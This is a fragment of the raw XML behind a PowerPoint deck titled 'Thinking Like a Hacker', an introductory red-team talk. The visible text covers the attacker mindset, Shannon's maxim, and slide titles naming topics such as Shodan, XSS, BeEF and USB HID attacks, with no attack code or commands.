            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Byrd, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CodeMash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2016</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1,000% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>true</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>But attackers don’t stop at verification</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Try to think of what the defender/creator forgot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Breaking vs. Fixing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bug vs. Why’d You Do That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86" y="1417638"/>
            <a:ext cx="3014265" cy="516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5920353" y="2417736"/>
            <a:ext cx="2433233" cy="1549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7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Basics: Picking Things Apart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expected for the unexpected:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Expected: 	Networks must allow traffic on port 443 for HTTPS websites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Unexpected: 	A port is a port, not a cop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Using security against the defenders:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Expected:	HTTPS secures data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Unexpected:	HTTPS secures ALL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118" y="3195723"/>
            <a:ext cx="3775129" cy="3368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12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Shannon’s Maxim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dirty="0" smtClean="0"/>
              <a:t>“The enemy knows the system”</a:t>
            </a:r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sz="3600" dirty="0" smtClean="0"/>
              <a:t>-- Claude Elwood Shannon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>The Father of Information Theory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19464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25846</TotalTime>
  <Words>1124</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>187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Lato Light</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Thinking Like a Hacker</vt:lpstr>
      <vt:lpstr>Introductions</vt:lpstr>
      <vt:lpstr>What is “Red Team”?</vt:lpstr>
      <vt:lpstr>Today’s Red Team: Promoters of Security</vt:lpstr>
      <vt:lpstr>The Mindset</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Red Teaming is Like Quality Assurance++</vt:lpstr>
      <vt:lpstr>The Basics: Picking Things Apart</vt:lpstr>
      <vt:lpstr>Shannon’s Maxim</vt:lpstr>
      <vt:lpstr>Where in the World is…</vt:lpstr>
      <vt:lpstr>Part One: Learning to Discover</vt:lpstr>
      <vt:lpstr>Shodan: A Trip to Campinas, Brazil</vt:lpstr>
      <vt:lpstr>A Hu-Mongo-us Problem</vt:lpstr>
      <vt:lpstr>Google Black Magic: Search Filters</vt:lpstr>
      <vt:lpstr>How Did That Happen?</vt:lpstr>
      <vt:lpstr>Charting the Unknown</vt:lpstr>
      <vt:lpstr>Fuzzing &amp; Brute-forcing</vt:lpstr>
      <vt:lpstr>Fuzzy Bunnies &amp; Crashing Apps</vt:lpstr>
      <vt:lpstr>Humble Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Hacking Harder: XSS Can Do More</vt:lpstr>
      <vt:lpstr>BeEF: Browser Exploitation Framework</vt:lpstr>
      <vt:lpstr>BeEF Demo: </vt:lpstr>
      <vt:lpstr>Lesson: JavaScript Can Do More Than Should Ever Be Allowed</vt:lpstr>
      <vt:lpstr>Recap</vt:lpstr>
      <vt:lpstr>Getting Up Close &amp; Personal</vt:lpstr>
      <vt:lpstr>Fun with RFID</vt:lpstr>
      <vt:lpstr>Trusting HIDs &amp; Ducks</vt:lpstr>
      <vt:lpstr>But HIDs Can’t Execute Malware… Right?</vt:lpstr>
      <vt:lpstr>Quackery Demo</vt:lpstr>
      <vt:lpstr>A Red Team Example &amp; Wrap-up</vt:lpstr>
      <vt:lpstr>Thank You! Any Questions?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Like a Hacker</dc:title>
  <dc:creator>Christopher Maddalena</dc:creator>
  <cp:lastModifiedBy>Christopher Maddalena</cp:lastModifiedBy>
  <cp:revision>214</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-12-07T16:49:32Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-01-30T17:03:17Z</dcterms:modified>
</cp:coreProperties>
</file>